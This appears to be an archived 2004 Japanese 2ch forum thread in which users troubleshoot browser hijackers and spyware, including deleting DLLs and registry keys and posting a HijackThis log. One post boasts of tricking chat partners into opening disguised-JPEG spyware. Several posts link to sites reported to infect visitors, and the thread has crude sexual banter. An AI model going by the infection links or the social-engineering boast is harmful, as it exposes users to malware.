 ( >| ●  ●//   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  `‐|   U  /ノ < >>651 ウイルス貼るな、蛆虫、氏ね!
.   \ ━ ,/    \______________
    (((O⊃>
    \  'oヽ
     |,,,,,,∧|
     /  ∧ \
   / / ヽ ヽ
   ト-<    |_/''┐
   ヽ=''     `=='

654 :ひよこ名無しさん:04/07/11 21:30 ID:???
 Å
 ('A`)  
 丿儿
まったく。つまらん。私が本物の遊びを教えてやる。
名前欄に ba&rk&raf&rus&rian&ras&rand&res&ru と書けば反転ができあがる


655 :ひよこ名無しさん:04/07/11 21:33 ID:???
スレ違いなんだけどよ、
以前、ネカマして生茶で150人の馬鹿男どもを昇天させたことがあってな
そのうち、半分くらいの野郎は私の写真とか言って偽装jpgスパイを踏ませたことがある。
警戒してた野郎も中にはいたけどな


656 :ひよこ名無しさん:04/07/11 21:34 ID:???
>>653
そろそろTVCMを再開したら?

657 :ひよこ名無しさん:04/07/11 21:34 ID:???
>>655
このスレの初心者にネカマなんて言葉分からんよ

658 :ahofusianassndeau:04/07/11 21:34 ID:???
かきました


659 :620:04/07/11 22:16 ID:NVJZHWmg
なにから書けばいいっすか??

今セーフモードで3点セット試したがまたいました

660 :ひよこ名無しさん:04/07/11 22:17 ID:???
>>659
まずは生年月日と住所、本名から書け

661 :ひよこ名無しさん:04/07/11 22:17 ID:???
>>659
それ無害なやつだから無理して消さなくてもいい
逆に消そうとしてレジストリいじくると
一つ間違うとウインドウズ起動しなくなる

662 :ひよこ名無しさん:04/07/11 22:21 ID:???
>>659
どっかで聞きかじった知識で怖がってるんだろうけど
スパイウェアについて理解してから削除するなりしたほうがいいよ。


663 :620:04/07/11 22:21 ID:NVJZHWmg
システムの復元は、1ヶ月前ぐらい前からしかできなく 

なぜか何日か選んでもうまくいかなく やめました    

664 :ひよこ名無しさん:04/07/11 22:23 ID:???
>>663
復元ポイントを作らないのが悪い。
無理に消す必要の無いスパイウェアなんだけど…

665 :610:04/07/11 22:25 ID:8h/QSWmm
テンプレの内容を再度やってみましたがやはり
ホームページがttp://here4search.com/hp.htm?id=191に固定されたままです。

Ad-aware 6.1とSpybot Search&Destroy 1.3で見つかった異常は修正しました。

HijackThisとCWShredderでは何も異常は見つからなかったので>>8の内容も試したのですが異常は見つかりませんでした。





666 :ひよこ名無しさん:04/07/11 22:26 ID:???
>>663
safemodeで起動して
system32 フォルダの kfpfif.dll を削除する。

667 :ひよこ名無しさん:04/07/11 22:26 ID:???
666getしていいですか?

668 :ひよこ名無しさん:04/07/11 22:26 ID:???
>>667
どっか逝け

669 :ひよこ名無しさん:04/07/11 22:28 ID:???
ワーイ釣れた釣れた
どっか逝くyo

670 :ひよこ名無しさん:04/07/11 23:40 ID:HrzPXH7+
インターネットオプションのHPのアドレスを書き換えても元に戻ってしまいます
>>1のテンプレにあるハイジャッカーの検索したのですが見当たりませんでした
about:blankとページ?に飛ばされてしまいます どうしたら良いのでしょうか?

WINDOWS XP IEを使用しています

671 :ひよこ名無しさん:04/07/11 23:41 ID:???
システム復元しな

672 :ひよこ名無しさん:04/07/11 23:42 ID:HrzPXH7+
正常だった日の設定に戻すやですか?

673 :620:04/07/11 23:42 ID:YEqDkm2S
664>復元ポイントはスキャンした日とかかってにポイントになるから
  ふるいのはけされていくんだよ

610>いっしょだね

666>今やってみます

674 :620:04/07/12 00:19 ID:oz+PAPtg
666-それなかったよ


675 :ひよこ名無しさん:04/07/12 00:21 ID:???
>>674
ざ ま あ み ろ

676 :ひよこ名無しさん:04/07/12 03:09 ID:GMCrVXVk
パソコン上部のアイコン類にエロ会社のツールが引っ付いてしまいました
どうやってったら取れますか?

677 :ひよこ名無しさん:04/07/12 03:12 ID:???
>>676
ヌルポ

678 :ひよこ名無しさん:04/07/12 03:21 ID:???
>>676
このスレッドの >>4-11 とそのリンク先を読んで自己努力
 偽のリンクを貼るヤツがいるので、リンク先をよく確認。


679 :Opera 最新版 7.52公式?日本語版出たぞ:04/07/12 03:23 ID:???
下記のアドレスからダウンロードできる。ふつうに使うだけならjavaなしを推奨。
インストーラや言語ファイルもあらかじめ日本語になっている。言語ファイル
を別にダウンロードする必要もなく簡単。

javaあり ftp://ftp.opera.com/pub/opera/win/752/ja/java/ow32jaja752j.exe
javaなし ftp://ftp.opera.com/pub/opera/win/752/ja/std/ow32jaja752.exe

>>403のミラーサイトにあるのと同一ファイル
 http://public.planetmirror.com/pub/opera/win/752/ja/

この日本語版、Opera社のサイトに置いてあるんだから、公式版なんだろうが、
本社の玄関 http://www.opera.com/ から入ってもまだ見当たらない。

680 :ひよこ名無しさん:04/07/12 03:28 ID:GMCrVXVk
>>678
読んだんですが、該当しないと思うんです
もし勘違いしてたら、どのテンプレに当たるか教えて頂きませんか?

681 :ひよこ名無しさん:04/07/12 03:30 ID:???
>>680
読むだけではなくて、全部する。

682 :ひよこ名無しさん:04/07/12 03:32 ID:GMCrVXVk
>>681
分かりました

683 :676:04/07/12 03:53 ID:GMCrVXVk
>>681
システムの復元を試みたら直りました
どうも有難うございました

684 :620:04/07/12 08:19 ID:2HBM3DiA
システムの復元してもエラーで できませんでしたっていわれるし.....

685 :ひよこ名無しさん:04/07/12 08:42 ID:???
>>684
about:blank対処法暫定ページ
ttp://higaitaisaku.web.infoseek.co.jp/removeaboutblank.html

686 :ひよこ名無しさん:04/07/12 15:05 ID:???
>>684
システムの復元にも当たり外れがあるみたいだから、地道に対処するかリカバリ
するしかないね・・・。

687 :ひよこ名無しさん:04/07/12 15:27 ID:???
色々調べてみたら最近のスパイウェアは質が悪すぎる。
テンプレの>>5をいきなり実行すると、
もぐったり、とんでもないゴミを残しまくるのが多すぎる。
うっかりするとPCが起動できなくなる状態のものまである始末。

たとえば、BlazeFind / Search Assistant (Windows SA)
ttp://higaitaisaku.web.infoseek.co.jp/cgi-bin/ht/database.cgi?cmd=dp&num=137

はじめに本家(大学病院)のようにアンインストールログとスタートアップログ、
それとHijackthisのログを貼ってもらった方が安全かも。
それから、細かな指示をするという形をとった方がいいのかも知れない。
テンプレを試すこと自体が危険な状態では新しいテンプレが必要になる日も、
そう遠くないかも知れない。

688 :ひよこ名無しさん:04/07/12 15:35 ID:???
Spybotで削除した後免疫化したらAdaware使う必要無いな

689 :Opera最新版は7.52、lngファイルは7.50:04/07/12 15:53 ID:???
Opera v7.52のインストールと日本語化の手順

■v7.23以前をインストールしている場合は「アプリケーションの(プログラム)の
 追加と削除」からアンインストール。(7.5xからは上書きインストで問題ない)

■Opera本家から本体をダウンロード
  Opera7.5(最新版)http://www.opera.com/download/?lng=en&ver=7.52
 いちばん下の赤い DOWNLOAD ボタンを押す。

■Opera本家から本体ファイルをダウンロード
  Opera7.52(最新版)http://www.opera.com/download/?lng=en&ver=7.52
 いちばん下の赤いDOWNLOADボタンを押す。ダウンロードサイトを選ぶ。
 (米国サイトが成功率高い。混んでいたら別のサイトを選択)

■Opera本家から7.50用言語ファイルをダウンロード
  http://my.opera.com/community/customize/langs/
 Select Opera Version and Language ←バージョンと言語の選択ボックス
 ▼ボタンを押してリストを開く→Windows-7.50 Japnese(1) をそれぞれ選択→
 地球儀アイコンをクリック→ja_74818.lngという日本語用言語ファイルが選択される→
 Opera.exeが存在するフォルダにダウンロードする。★7.51用の日本語ファイルは
 アフォなので選んではダメ。7.52用日本語ファイルは未発表。

■Operaに日本語言語ファイルを設定
  Operaを起動→OperaのメニューのTools→Preferences→ Languages→
 User Interface Languageでchooseボタンを押す→ダウンロードしたja_74818.lng
 を選択→OK
 これでメニューは日本語で表示されるはずだが、日本語優先の設定もしておこう。
 Tools→設定→言語→「ウェブページの閲覧で優先する言語」で「追加」→
 japanese(ja)選択→「上へ移動」ボタンで一番上にする→「エンコード情報が不足
 しているページに使用するエンコード方法」→shift_jisを選択→適用→OK

690 :ひよこ名無しさん:04/07/12 15:56 ID:???
>>688
そんなことは無いぞ。

691 :ひよこ名無しさん:04/07/12 16:06 ID:???
最近はエロサイトには怖くて逝ってないな。リカバリするはめになったら萎えるからな。

692 :ひよこ名無しさん:04/07/12 16:26 ID:???
いくら敵の手が込んできたとは言え、やはりやられる奴はアフォしかいない(アフォ

693 :ひよこ名無しさん:04/07/12 16:30 ID:???
俺は自他共に認めるアフォですがOperaにして幸せになれました

694 :ひよこ名無しさん:04/07/12 17:11 ID:???
僕もブラウザをOperaに変えてから、宝くじに当たり、
東大にも合格して、藤本美貴似の彼女もできました。
まさにOperaさまさまです。

695 :ひよこ名無しさん:04/07/12 17:11 ID:???
>>693
それはよかったね。家族共用のものであれば無茶はするなよ。

696 :ひよこ名無しさん:04/07/12 19:33 ID:zYbFweLi
このアドレスをクリックしたら→http://genny.port5.com/live/
いきなり画面が真っ白になって外国のサイトに
飛ばされました。そのとき電源を落とした後
またつけたのですが、デスクトップに変なアイコンが現れました。
で、そのアイコンを削除してもすぐにそのアイコンが復元されて
またデスクトップに現れます。
また、インターネットに接続していないのに
勝手にインターネットの画面が開かれます。
どうすればいいのでしょうか?助けてください。
ちなみにウインドウズ98です。


697 :ひよこ名無しさん:04/07/12 19:36 ID:???
>>696
直リンするな!
テンプレ読め!

698 :ひよこ名無しさん:04/07/12 19:38 ID:???
>>696
■一通りFAQを "実行" してもお手上げの場合は、質問しても良し。■
(OS、ブラウザ、症状、やってみた事、等を明記しないと放置 or ネタ回答)

▼━ 質問のしかた ━━━━━━━━━━━━━━━
 * 他所から誘導された場合は、その旨書く(マルチポストとの区別)

▼━ 禁止事項 ━━━━━━━━━━━━━━━━━
 * マルチポスト(複数の場所で同じ質問をすること)

699 :696:04/07/12 20:07 ID:1Rxli8D1
すいませんでした。F&Qは全て効果がありませんでした。

パソコン初心者質問板から誘導されてきました
このアドレスをクリックしたら→ttp://genny.port5.com/live/
いきなり画面が真っ白になって外国のサイトに
飛ばされました。そのとき電源を落とした後
また再起動したのですが、デスクトップに変なアイコンが現れました。
で、そのアイコンを削除してもすぐにそのアイコンが復元されて
またデスクトップに現れます。
また、インターネットに接続していないのに
勝手にインターネットの画面が開かれます。

ちなみにウインドウズ98です。



700 :ひよこ名無しさん:04/07/12 20:18 ID:???
>>699
同じ事書いても同じ答えしか返せない。
だいたいそんな短時間で全てできないだろう。
直したいなら念入りにやりな。


701 :ひよこ名無しさん:04/07/12 20:18 ID:spNZh6Tg
何もなんないよ?
無修正へようこそ

702 :ひよこ名無しさん:04/07/12 20:32 ID:???
>>699
>>697を本気にしてどうするhをとる事と直リンは違う



703 :ひよこ名無しさん:04/07/12 20:49 ID:???
>>699
懐かしいな、俺もそんな事があった。どうやって治ったかは思いだせんが・・・

704 :ひよこ名無しさん:04/07/12 21:08 ID:???
>699
テンプレをすべて実行してないのにすべてなんて言うな。
すべて実行しているなら、このスレッドにHijackThisのログも貼ってるはずだよな?
>>10にそういうテンプレートが存在する)
俺は699=696のものらしいログを見ていないのだが。
上記の理由から、>>1により699=696はネタと認定される。

ネタでなく、放置されたくなければ、テンプレ熟読のうえ「本当に」実行せよ。

705 :ひよこ名無しさん:04/07/12 21:29 ID:???
なるほど。

706 :ひよこ名無しさん:04/07/12 21:34 ID:kQEBKZ1Q
リンクまわってたら
無断で18禁同人誌がたくさんUPされてるところにいってしまったんですが、
読んでしまったら、何か仕掛けがされていて(情報抜かれたり)
大変なことになったりしますか?

707 :ひよこ名無しさん:04/07/12 21:37 ID:???
場所教えろ。

708 :706:04/07/12 21:39 ID:kQEBKZ1Q
ttp://www.ss.iij4u.or.jp/~g-free/anix/010/index.html

709 :620:04/07/12 21:51 ID:rWsN86yZ
そうしたらいいだべか.......

about:blank消えない みんなもわからんようでだし.....アベシ

710 :ひよこ名無しさん:04/07/12 21:52 ID:???
デブは何をやってもデブ。

711 :620:04/07/12 22:00 ID:rWsN86yZ
685>about:blank対処法暫定ページってサイトのはもうやりました

「まず、このabout:blankの「Search For...」の画面が出るのを待ちます。
出たら、画面上の適当な場所を右クリックして「ソースの表示」をクリックします」

このページ右クリックできませんがな 表示からソースをするとぜんぜん違う
文になっちゃうし..................................

712 :ひよこ名無しさん:04/07/12 22:02 ID:???
ダメだ・・・もう打つ手がねぇ。

713 :ひよこ名無しさん:04/07/12 22:10 ID:???
>>711
Search For型は悪質かつ新手のCWSで今のところ明確な対処法が無い。
しかし、このSearch For型で悩んでいる人も一人や二人では無いと思う。
被害対策の部屋サイトでabout:blank関係をしらみつぶしに当たるか、思い切ってOS再インスコするしか無いかもしれん。



714 :620:04/07/12 22:18 ID:rWsN86yZ

............(O’’O)

715 :706:04/07/12 22:20 ID:kQEBKZ1Q
ブラクラとかじゃないんで
ほんとお願いします。
教えてください。

716 :ひよこ名無しさん:04/07/12 22:22 ID:???
>>715
ちんこ勃起して大変!!

717 :706:04/07/12 22:32 ID:kQEBKZ1Q
いえ、ほんとにお願いします。ごめんなさい。
教えてください。
読んでしまっても危害はないんですか?

718 :ひよこ名無しさん:04/07/12 22:37 ID:???
>>717
スレ違いなんだが、IEで直接踏んで様子を見たけど、今のところウィルス無し。
問題無いと思う。

719 :ひよこ名無しさん:04/07/12 22:39 ID:???
>>717
マジない。

720 :ひよこ名無しさん:04/07/12 22:42 ID:???
>>718
ちんこ勃起して大変!!

721 :ひよこ名無しさん:04/07/12 22:42 ID:???
>>717
この中のどれを見たんだ、あ?

722 :706:04/07/12 22:46 ID:kQEBKZ1Q
>>721
妖しかったので
見てはないですが、
画像クリックして直前まで進んでしまったので。
ちょびっつのチョビットだか言うやつです。
スレ違いすみません。

723 :ひよこ名無しさん:04/07/12 22:47 ID:???
ttp://www.free-adult-hosting.net/canonbo001/006/picture/[001-028].jpg


724 :ひよこ名無しさん:04/07/12 22:48 ID:???
>>722
多分全部ダイジョブだから、今夜は思い切りガンガレ!!

725 :706:04/07/12 22:52 ID:???
>>718
>>719
>>724
すみません。ありがとうございました。
初心者は初心者らしく安全なとこでサーフします。

726 :ひよこ名無しさん:04/07/12 22:52 ID:???
>>706
粘着されるとウザいし他の相談者さんにも迷惑なので、簡単に調べてみました。
ちゃんと、2次元オンナのマンコを妄想してオナニーしただけですか?
他の、狩猟民族欧米人のうす汚いプッシー広告に釣られたりしませんでしたか?
同人漫画を見ただけならば大丈夫かと思われます。
余計なリンクにジャンプすると、いくつかスパイウェアをケツの穴に
ぶち込むサイトがあるようでした。

727 :ひよこ名無しさん:04/07/12 22:54 ID:???
狩猟民族欧米人のうす汚いプッシー広告はヤバイの??

728 :ひよこ名無しさん:04/07/12 22:56 ID:???
>>727
全部が全部ヤバいわけではありませんが、警戒して損はありません。

729 :ひよこ名無しさん:04/07/12 22:58 ID:???
>>728
ありがトン。

730 :ひよこ名無しさん:04/07/12 23:04 ID:???
誰も「言葉遣いがしっかりしたヤシなのか、下品なヤシなのか
判断に苦しむな(;´Д`)」と困惑してくれないわけですが。

731 :ひよこ名無しさん:04/07/12 23:08 ID:???
>>730
慣れてる。
惰性。
通常営業。

732 :ひよこ名無しさん:04/07/12 23:08 ID:???
>>730
ここの回答者は一人二役が基本です。

733 :ひよこ名無しさん:04/07/12 23:14 ID:???
      / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      |   マスター、今夜も賑わってるね♪
       レヽ___________________
   ∧_∧        ∧_∧    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   (  ・∀) / ̄ヽ  (´∀`  ) < 毎度ありがとうございますモナ
   (   `つ 日 凸 ( つ つヽ  \________________
   (_ ⌒./   凵ヽ | | | |ヽ.凸|   |
   「  (_/Y     ヽ _(__) | |\|   |
  ┗┳━| ̄ ̄ ̄ ̄ ̄|    ..   \|. │  |
    ┻\|        .|        \.|   │

734 :ひよこ名無しさん:04/07/12 23:57 ID:???
AGVでスキャンして、でてきた二個のウイルスを処理。そのあと、トレンドマイクロ
のオンラインスキャンでもう一度スキャンしたら、また4個のウイルスを検出してし
まいました。以下がそれです。

TROJ AGENT AQ   C\WINDOWS\TEMP\5233.TMP
TROJ AGENT AQ   C\WINDOWS\TEMP\5255.TMP
TROJ AGENT AQ   C\WINDOWS\1086432816.dll
TROJ AGENT AQ   C\WINDOWS\1086432819.dll

いずれも、最初は隠しファイルになっていて、「オプション」で「すべてのファイルを
表示」にしたら出てきたファイルです。

これ全部削除しても大丈夫でしょうか。

どうぞよろしくお願いします。ウイルス感染日を見たら、例の長崎少女殺人事件
スレで感染したウイルスでだったので、ここで質問させて頂くことにしました。

735 :ひよこ名無しさん:04/07/13 00:00 ID:???
>>734
とりあえずTEMPは一時フォルダだから消しても問題無い。
問題は1086・・・だな。


736 :ひよこ名無しさん:04/07/13 00:05 ID:???
>>734
選択肢は2つ
1.削除して後の憂いを絶つ。起動しなくなったらリカバリ覚悟。
2.感染してると分かっているが、覚悟を決めて放置。

オススメは@。消して済むなら御の字だ。消しちゃえ消しちゃえ。

737 :ひよこ名無しさん:04/07/13 00:05 ID:???
まっちぽんぷ

738 :ひよこ名無しさん:04/07/13 00:08 ID:???
>>735>>736
一個ずつごみ箱に捨てて行って、異常がでたら戻す
、というのは駄目でしょうか。


739 :ひよこ名無しさん:04/07/13 00:09 ID:rHJ3hdtf
すみません、738は734です。

740 :ひよこ名無しさん:04/07/13 00:11 ID:???
>>739
OK

741 :ひよこ名無しさん:04/07/13 00:13 ID:???
>>738
>>735氏の言うとおり、TEMPの方はサックリ削除で問題なし。
windowsフォルダ直下の1086…….dllはそれでもいいが、
ゴミ箱入ってれば起動時に読み込んでくれないから同じことかな。


742 :734:04/07/13 00:26 ID:???
やってみます。
皆様どうもありがとうございました!

743 :ひよこ名無しさん:04/07/13 00:50 ID:???
>734
トレンドマイクロのウィルスデータベースで、その名前のものを
さがして、個別の対策法がのっているのを実行するのが吉
と思う

744 :ひよこ名無しさん:04/07/13 01:23 ID:Pvc7pFuy
OPERA使ってたのに突然『about:blank』が出た‥(もちろんオペラ上で)
製品版買おうかと思ってたけど不安になってきました

745 :ひよこ名無しさん:04/07/13 01:25 ID:???
>744
Operaも about:blankのウィルス&スパイウェアに感染するよ
(経験済)

746 :ひよこ名無しさん:04/07/13 01:31 ID:???
>>745
JavaスクリプトOFFにしないとダメだっけ?

747 :Opera:04/07/13 01:32 ID:???

   ∧∧
   /⌒ヽ)
  i三 ∪
 ○三 |
  (/~∪
  三三
 三三
三三三

748 :744:04/07/13 01:51 ID:Pvc7pFuy
>745
オペラをアンインストール→新たにオペラダウンロードで直りますか?
製品版だと面倒くさそう‥

749 :ひよこ名無しさん:04/07/13 01:55 ID:???
>>748
やってみたら?


結局Operaは起動が遅い広告まで入る糞ブラウザ

750 :ひよこ名無しさん:04/07/13 01:56 ID:???
>>748
IE上でも症状あるんじゃない?

751 :ひよこ名無しさん:04/07/13 01:57 ID:???
>>745
ほんと? 実験機で試してみたい。どこへ行けばいいの?

752 :ひよこ名無しさん:04/07/13 02:02 ID:???
>>751
ラウンジの例のスレ辺りでスパイウェアを抽出して踏んでみたらどうだろう?

753 :ひよこ名無しさん:04/07/13 02:05 ID:???
>>749
Win2kSP4でメモリ256MBという普通のマシンだが、IEもOperaもFIREFOX
も2〜3秒で起動する。(FONTフォルダのサイズは250MB+)

デスクトップ中アイコンで足の踏み場もなかったり、Hijackthisでログ取る
とずらずら100行くらい出てくるような厨な環境だとなんでも起動は遅くなる。

754 :ひよこ名無しさん:04/07/13 02:07 ID:???
>>753
W2KSP4 256MB HDD 60GBのノート。
デスクトップのアイコンはマイコンピュータ、マイネットワーク、ごみ箱の三つだけだよ。

755 :ひよこ名無しさん:04/07/13 02:14 ID:???
>>751
ここの >>199
昨日これ踏んで、search for…に感染しました。
2日間色々試したけど、削除できたと安心しても
数時間で再発します。

756 :ひよこ名無しさん:04/07/13 02:15 ID:???
>>755
それOperaでの感染もするの?

757 :ひよこ名無しさん:04/07/13 02:18 ID:???
>>755
テンプレにある Search for の対策ページの
AppInit_DLLs キーの削除をやりましたか

758 :ひよこ名無しさん:04/07/13 02:18 ID:???
>>756
私は、Opera使ってないので不明です。
どうせなら試して見ようかな。

759 :ひよこ名無しさん:04/07/13 02:18 ID:???
地雷師恐るべしw

760 :ひよこ名無しさん:04/07/13 02:20 ID:???
>>751
とりあえず、Operaで踏んでみてくれないかな?まぁ、面倒な事になるかもしれんが。

761 :ひよこ名無しさん:04/07/13 02:20 ID:???
てか、知らずに AppInit_DLLs に書き込まれるなんて
大型セキュリティホールでなのか

762 :755:04/07/13 02:30 ID:???
>>757
ご助言有難うございます。
AppInit_DLLsの削除もやってみました。
セーフモードで、CWShredder→spybotsd13→Ad-aware 6.0
その後、spywareblaster入れて、SpywareGuardも入れましたが
それでも、about:blankに成って、search for…と警告のポップアップが
出現します。


>>760
少しは、誰かの為になるのなら試してみます。
>>679 ので良いでしょうか?
java は、有り?無し? どっちで試した方がいいのかな?

763 :ひよこ名無しさん:04/07/13 02:32 ID:???
>>762
あ、自分で駆除できない人なら踏まないで。

764 :ひよこ名無しさん:04/07/13 02:34 ID:???
>>762
手順としては、search forのソースを見て、
res:// とか base// とかで書かれているDLLのなまえを解読して、それを削除する。
レジストリ項目も削除する。
メモ帳とWindowsMediaPlayerを書き換えられていたら、それらも元に戻す。
さらに、いろいろして、最後に AppInit_DLLs と言う感じですが

765 :755:04/07/13 02:36 ID:???
是非やらせて下さい、皆さんのお役に立ちたいんです。

766 :755:04/07/13 02:45 ID:OLv7nZHz
>>764
それ全部やりました、
dll ファイルは、どのタイミングかわかりませんが削除しても
出現します。場所はWint\system32で日付が新しいので、
もうソースを見なくても特定できます。
sp.html は、削除してもLocal Settings\temp に出来ますね。

上記のファイルとレジストリーの削除を指示されているようですが、
元凶のファイルが何処かに有るようで、時間が経つと再発するようです。
誰か、その元凶のファイルを突き止めた人居ませんか?

>>765 は、私じゃないですが、少しでも役に立つなら色々やってみます。
また、成りすまされると嫌なので、ID出しますね。

767 :ひよこ名無しさん:04/07/13 02:45 ID:???
人柱よ、期待しておるぞ。

768 :ひよこ名無しさん:04/07/13 03:07 ID:???
>755
急場しのぎの策だけれど、\system32にある問題のdllファイルを削除
しないで、セーフモードで開けて、適当なテキストをはりつけて
書き換えてしまうと、dllの再生産が止むのではないかと思う。

769 :755:04/07/13 03:24 ID:OLv7nZHz
>>768
それ一度試してみます。
sp.html は、タグを消してやってみたんですが、
それには気が付きませんでした。
サーフモードにして、適当なファイルを名前変更して
持ってきます。

Operaは、IEではダウンロード出来なかったので
FFFTPで 落としました。先ずはJAVA有りで試します。
DLLの名前変更したら試せないか
それでは、先にOperaを入れてみます。

770 :ひよこ名無しさん:04/07/13 03:26 ID:???
>>769
バックアップは大丈夫?
最悪、OS再インストールになるよ。

771 :755:04/07/13 03:48 ID:OLv7nZHz
>>770
データのバックアップは、大丈夫です。
about:blankには、もう感染しているので諦めています。
ご心配有難うございます。

参考に、レジストリーが書き換えられる時に出る
SpywareGuard の警告です。
http://49uper.com:8080/img-s/9281.gif

それでは、セーフモードで最小限の駆除をしてから
Opera(java付き)をインストールしてみます。
変化があったら後ほど、ご報告します。

772 :ひよこ名無しさん:04/07/13 05:16 ID:???
>>744
operaの場合右クリックしたままマウスを下に動かすと新規ページ(まっ白な画面)が出てくるけどそれと勘違い?

773 :ひよこ名無しさん:04/07/13 05:17 ID:???
>>771
Operaの場合はjavascriptの窓で「OK」をクリックしなければ
ハイジャッカーをインストールされることはないと思うんだが、
そのへん確認きぼん。で、もし暇があったらFirefoxでどうなる
か実験するとさらによさげ。

774 :744:04/07/13 05:19 ID:Pvc7pFuy
皆さん本当にお騒がせしてすいません
ホント、あたたかく思います
ついでに、わたしのはオペラ無料版(3日前に落としました)で、アバブラはサーチフォータイプではなく、今の所突如アバブラになるだけの症状です
ホームページは妨害されていません
IE側のアバブラ(サチフォー型)は直した後の出来事です

775 :755:04/07/13 05:24 ID:OLv7nZHz
Opera(java付き)を入れて1時間ですが、変化無し。
その間に、>>199 に突入
http://syobon.zive.net:85/src/syobon2547.jpg.html
about:blank よりも、ウイルスの方が心配です。
IE では、速攻で観測されたabout:blank search for… は出現せず。
前回、IEが感染した時に保存しておいたsp.html を読み込ませても
何も変化無し。
http://syobon.zive.net:85/src/syobon2548.jpg.html

前の方に有った、about:blank の発症事例は本当なのか?
もうしばらく観察してみます。




776 :ひよこ名無しさん:04/07/13 05:25 ID:???
>>775
乙。

そのURLは何?キャプ?

777 :744:04/07/13 05:27 ID:Pvc7pFuy
>772
いえ、割り込み型(放置してる時に出る)で、もちろんオペラ上での事です(IEアバブラではありません(

778 :ひよこ名無しさん:04/07/13 05:50 ID:???
みなさん乙。 漏れはもう練る

779 :755:04/07/13 05:51 ID:OLv7nZHz
>>776
アップローダのurlです。
キャップた画像です。
スパイウエアのテストというよりも、ウイルスのテストに成ってます。

Operaを入れたのは、良いのですが
ノートンや2chブラウザ他、結構IEのエンジンを使ったものが
有るので、迂闊に起動するとレジストリの警告(>>771)が出ます。
それでも、今の所見た目上はOperaに影響は無いようです。

780 :ひよこ名無しさん:04/07/13 05:55 ID:???
>>779
OpenJaneでもDoeのほうはIEコンポ使ってない。

781 :ひよこ名無しさん:04/07/13 05:57 ID:???
>>780
Jane Doe View がなかなかイイですよ

782 :ひよこ名無しさん:04/07/13 06:01 ID:???
>>779
あー、上のURLすごい事になってるな(w


最近のNortonのウィルス定義にはスパイウェア検出も含まれてるから
スパイウェアもウィルスとして反応するんだと思うよ。
NortonはTrojとする事が多いかな。

783 :755:04/07/13 06:04 ID:OLv7nZHz
>>780-781
後で、移行してみます。
ノートンは、IEがベースなのでブラウザはOperaに移行したとしても
根本的な解決には成らないのかな。

>>782
そうですか、半分安心しました。
有難うございます。

784 :ひよこ名無しさん:04/07/13 06:04 ID:???
で、結局、上のキャプ画像見る限りOperaでもノートンは反応する訳で、
Operaを使ってるとスパイウェアを入れられないというのは勘違いで、
Operaを使ってればOperaのスタートページとかコンポーネント自体は改変されないが、
IEコンポーネントはOpera使ってようと、IE使ってようと悪さされるということだな。

785 :ひよこ名無しさん:04/07/13 06:08 ID:???
>>783
ノートン本体はIEベースじゃないよ。
インストーラが使ってるぐらいじゃないかな。

786 :ひよこ名無しさん:04/07/13 06:11 ID:???
>>755
まじで乙だな。

Opera神話崩壊の予感。

787 :ひよこ名無しさん:04/07/13 06:14 ID:???
cgiはやばいよ。

788 :755:04/07/13 06:21 ID:OLv7nZHz
>>784
私もそういう事だと思います。
Operaは発動の引き金には成らないかもしれないけど、
確実にPCにスパイウエアは進入しています。
そのスパイウエアが他に悪さをしてなければ良いのですが。

>>785
誤解を招くような書き方をしたようです。
どの部分が原因か分かりませんが、ノートンを起動・終了すると
IEでポップアップが出てしまうのです。
それとノートンからシマンテックへ飛ぶ時もIEが使われます。

789 :2ch有効活用 ◆NEVADAnVGU :04/07/13 06:34 ID:ufvKFQX+
かちゅ〜しゃってIEコンポネですか?

790 :ひよこ名無しさん:04/07/13 06:36 ID:???
>>789
http://www.geocities.jp/browser_2ch/index.htm

791 :ひよこ名無しさん:04/07/13 06:37 ID:???
>>755
>>765
乙です。
あんたの人柱精神に乾杯。
有益な情報に期待してまつ。


792 :2ch有効活用 ◆NEVADAnVGU :04/07/13 06:41 ID:ufvKFQX+
>>790

39です。   どうやら IEコンポネ使用みたいですね。

793 :ひよこ名無しさん:04/07/13 06:43 ID:???
>>792
IE依存ブラウザのほうが圧倒的に多い。
作りやすいし。

794 :755:04/07/13 06:51 ID:OLv7nZHz
>>781
今、DoeView040706 に移行終わりました。
これなら起動しても、SpywareGuardのレジストリの警告出ませんね、
前に使っていたIE版だと、起動時にポップアップが監視スレの数だけ
出て困っていました。


795 :ひよこ名無しさん:04/07/13 06:53 ID:???
>>794
お、入れてみたか? なかなかいいだろ

796 :ひよこ名無しさん:04/07/13 07:03 ID:???
>>794
HijackThisのログ貼ってみる?
なんらかのトロイ(ブリッジ、ダウンロード系)に複合感染しているのかも。
力になれないかも知れないけど見てあげるよ。

797 :755:04/07/13 07:10 ID:OLv7nZHz
>>796
有難うございます、問題の解決になれば嬉しいです。
よろしくお願いします。

Logfile of HijackThis v1.97.7
Scan saved at 7:05:26, on 2004/07/13
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\System32\GEARSec.exe
C:\Program Files\Kerio\Personal Firewall 4\kpf4ss.exe
C:\Program Files\Norton SystemWorks\Norton AntiVirus\navapsvc.exe
C:\WINNT\system32\nvsvc32.exe
C:\WINNT\system32\regsvc.exe
C:\WINNT\system32\MSTask.exe
C:\PROGRA~1\NORTON~1\SPEEDD~1\nopdb.exe
C:\WINNT\system32\stisvc.exe
C:\WINNT\system32\drivers\WDelMgr20.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\Program Files\Kerio\Personal Firewall 4\kpf4gui.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\Explorer.EXE

798 :755:04/07/13 07:10 ID:OLv7nZHz
C:\Program Files\Kerio\Personal Firewall 4\kpf4gui.exe
C:\PROGRA~1\COMMON~1\SCM\ICONFIG.EXE
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe
C:\WINNT\Mixer.exe
C:\WINNT\system32\Internat.exe
